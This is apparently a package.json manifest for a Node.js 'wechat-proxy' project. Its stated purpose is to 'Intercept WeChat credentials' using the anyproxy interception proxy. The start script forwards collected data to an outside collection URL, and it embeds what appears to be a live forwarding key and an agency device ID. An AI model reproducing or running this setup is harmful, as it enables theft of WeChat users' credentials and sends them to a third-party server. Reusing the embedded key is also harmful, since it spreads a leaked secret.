| 123456789101112131415 |
- {
- "name": "wechat-proxy",
- "version": "1.0.0",
- "description": "Intercept WeChat credentials",
- "main": "index.js",
- "license": "MIT",
- "private": true,
- "dependencies": {
- "anyproxy": "^4.1.3"
- },
- "scripts": {
- "start": "PROXY_FORWARD_URL=https://lighter-node.mokamrp.com/callback/wechat/collect PROXY_FORWARD_KEY=6YjuqzDD3DAV2V0CQbMGDeUka6w3jYcM63W3JviUTHQ= PROXY_MOBILE_ID=agency07 node index.js"
- }
- }
|